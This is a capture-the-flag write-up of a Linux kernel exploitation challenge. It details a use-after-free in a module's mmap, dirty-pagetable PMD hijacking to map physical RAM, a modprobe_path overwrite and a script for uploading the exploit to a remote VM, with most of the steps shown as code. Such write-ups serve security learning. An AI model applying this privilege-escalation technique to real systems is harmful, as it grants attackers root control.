Phantom - Kernel PWN
Points: 750 | Flag: 0xfun{r34l_k3rn3l_h4ck3rs_d0nt_unzip} | Solved by: Smothy @ 0xN1umb

what we got
kernel pwn challenge, 750 points. the big one.
files:
bzImage- linux 6.6.15 kernelinitramfs.cpio.gz- initramfs with the modulephantom.ko- vulnerable kernel moduleinterface.h- ioctl definitionsrun.sh- QEMU launch script
protections: KASLR + SMEP + SMAP, single CPU, 256MB RAM
remote: nc chall.0xfun.org <port> (drops you into a busybox shell inside the VM)
the module
phantom.ko registers a misc device at /dev/phantom with these operations:
CMD_ALLOC (0x133701): callsalloc_pages(GFP_KERNEL, 0)for a single 4KB page, fills it with0x41, stores pointer in a global structCMD_FREE (0x133702): calls__free_pages(), sets afreedflag, but does NOT clear the page pointer or destroy the structmmap: usesremap_pfn_range()to map the physical page into userspace. checksfreed==0andsize <= PAGE_SIZErelease: properly frees everything on fd close
the vuln
classic dirty pagetable setup. remap_pfn_range() creates a VM_IO | VM_PFNMAP mapping - this type of mapping does not hold a reference count on the underlying page. so:
1. ioctl(CMD_ALLOC) -> kernel allocates physical page P
2. mmap(fd) -> userspace gets mapping to page P (no refcount!)
3. ioctl(CMD_FREE) -> page P goes back to PCP free list
now we have a dangling userspace pointer to a freed physical page. when the kernel reuses that page for page table structures... we get read/write access to page table entries from userspace. thats the dirty pagetable technique.
the rabbit holes (ngl this took a while)
rabbit hole 1: wrong page table level
first like 6 versions of the exploit assumed the freed page got reused as a PTE page (the leaf level that points to data pages). spent hours trying to write PTE entries - all reads through our modified entries returned 0.
the key diagnostic that finally clicked:
spray[3] before: 0x42 <- touching spray page works fine
PTE[3] kernel: 0x0 <- but UAF page shows NO kernel entry at index 3
PTE[3] after modify: 0x447c067 <- we wrote something
spray[3] after: 0x42 <- ...but it changed nothing
if our UAF page were the PTE page, uaf[3] should show the PTE entry the kernel installed when we touched spray[3]. it didn't. the freed page was actually being reused as the PMD page - one level up in the page table hierarchy.
for addresses in previously-unused PUD ranges, the kernel allocates the PMD page FIRST from the PCP list, then the PTE page. our freed page was the first one grabbed.
ran both KVM and TCG (software emulation) in parallel to rule out cache coherency. identical results on both. this is purely a page table level issue.
rabbit hole 2: the munmap trap (this one hurt fr)
ok so figured out it's a PMD page. wrote an exploit using PMD huge page entries - 2MB pages via the _PAGE_PSE bit. reads "worked" (no SIGSEGV) but always returned 0x0. even tried reading BIOS ROM at physical 0xF0000. zero. everything zero.
the problem: i was doing munmap on the spray VMA before remapping. when you munmap, the kernel clears PMD[0]. and since PMD[1..511] are all zero too, the kernel decides the entire PMD page is empty and frees it, then clears the PUD entry. the next mmap creates a BRAND NEW PMD page. our UAF mapping still points to the OLD (now double-freed) page.
the "no fault" behavior wasnt our huge pages working - it was the kernel's page fault handler silently allocating zero-filled pages for the new anonymous VMA. we were reading freshly allocated zeros lmao
the solve
step 1: PMD page UAF (without munmap!)
the fix is dead simple - never munmap. map one huge VMA from the start and just touch one page to anchor it:
// 1. UAF setup
ioctl(fd, CMD_ALLOC, 0);
uaf = mmap(NULL, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
ioctl(fd, CMD_FREE, 0);
// 2. Map LARGE VMA covering 129 * 2MB = 258MB
// MAP_NORESERVE is critical - VM only has 256MB RAM
spray = mmap((void *)0x200000000ULL, 129 * 2MB,
PROT_READ|PROT_WRITE,
MAP_ANON|MAP_PRIVATE|MAP_FIXED|MAP_NORESERVE, -1, 0);
// 3. Touch ONE page to force PMD allocation
// This anchors PMD[0] with a kernel PTE pointer
// PMD[0] being non-zero keeps PUD[8] alive!
*(volatile char *)spray = 'A';now uaf[0] shows the kernel's PTE pointer - confirms our UAF page IS the PMD page.
step 2: install 2MB huge page entries
#define HUGE_FLAGS (_PAGE_PRESENT | _PAGE_RW | _PAGE_USER | \
_PAGE_PSE | _PAGE_ACCESSED | _PAGE_DIRTY)
// = 0xe7
// PMD[i] maps physical address (i-1)*2MB as a 2MB huge page
for (int i = 1; i <= 128; i++)
uaf[i] = (uint64_t)(i - 1) * PMD_SIZE | HUGE_FLAGS;boom. 128 huge page entries = 256MB of physical memory mapped into userspace with full read/write. _PAGE_PSE (bit 7) tells the CPU this PMD entry IS the final translation - no PTE page needed. the CPU walks PGD -> PUD -> PMD and the PMD entry directly contains the physical address with 2MB granularity.
step 3: scan physical memory
with 256MB of phys mem readable, we do two things:
- scan for
/sbin/modprobe- overwrite with/tmp/x(our payload script) - scan for flag pattern
0xfun{- read flag directly from physical RAM
for (int i = 1; i <= 128; i++) {
char *p = (char *)(BASE_ADDR + i * 2MB);
// scan entire 2MB block byte by byte
while (p < end) {
if (memcmp(p, "/sbin/modprobe", 14) == 0) {
memcpy(p, "/tmp/x\0", 7); // overwrite modprobe_path
found_mod++;
}
if (p[0]=='0' && p[1]=='x' && p[2]=='f' && p[3]=='u' &&
p[4]=='n' && p[5]=='{') {
// read flag directly from physical memory!
}
p++;
}
}the modprobe_path trick: when the kernel encounters an unknown binary format (our /tmp/trigger file with \xff\xff\xff\xff), it executes modprobe_path as root. we overwrite it to point at /tmp/x which cats the flag.
but the real clutch play was the physical memory scan - on remote the modprobe trick didn't create /tmp/flag (different flag path), but we could read the flag straight from RAM.
step 4: remote exploitation
remote gives you a busybox shell inside the QEMU VM. had to upload the static binary (~795KB) through base64:
# compress + b64 encode the static binary
compressed = gzip.compress(data, compresslevel=9)
b64 = base64.b64encode(compressed).decode()
# blast all echo chunks without waiting for responses
# (waiting per-chunk was too slow, connection would die)
r.sendline(f"echo -n '{chunks[0]}'>/tmp/b")
for chunk in chunks[1:]:
r.sendline(f"echo -n '{chunk}'>>/tmp/b")
# wait for shell to process all echoes, then decode
time.sleep(15)
r.sendline(b'base64 -d /tmp/b | gunzip > /tmp/exploit && chmod +x /tmp/exploit')
r.sendline(b'/tmp/exploit')remote output:
[+] PMD captured! PMD[0] = 0x4586067
[*] Scanning 256MB...
[+] modprobe at phys 0x288b238
[+] FLAG FROM PHYS MEM: 0xfun{r34l_k3rn3l_h4ck3rs_d0nt_unzip}
[*] Overwrote 1 modprobe occurrences
[*] Triggering modprobe...
[-] /tmp/flag not created
[*] Done
modprobe path didnt work on remote (flag was stored somewhere else), but the physical memory scan pulled it straight from RAM. thats why you always have a backup plan.

key takeaways
-
know your page table level: PTE vs PMD vs PUD page reuse depends on allocation order from the PCP free list. for addresses in previously-unused PUD ranges, the PMD page is allocated first. run diagnostics before assuming.
-
NEVER munmap your anchor: if every PMD entry in a page becomes zero, the kernel frees the PMD page AND clears the PUD entry above it. always keep at least one kernel-installed PMD entry alive (touch one page to create it).
-
huge pages bypass everything: 2MB huge pages via
_PAGE_PSEin PMD entries give direct physical memory access. no PTE page needed, no kernel page fault handler involvement for present pages. just raw physical memory access. -
TCG = KVM for page table bugs: software emulation and hardware virtualization behave identically for page table manipulation. useful for ruling out cache coherency issues when debugging.
-
always scan phys mem for the flag: modprobe_path is the classic priv esc but the flag path might differ on remote. scanning physical memory for the flag format directly is the ultimate backup - if it's in RAM, you'll find it.
-
MAP_NORESERVE for big mmaps: in VMs with limited RAM, large anonymous mappings fail without this flag. it tells the kernel to not reserve swap space upfront.
flag
0xfun{r34l_k3rn3l_h4ck3rs_d0nt_unzip}
smothy out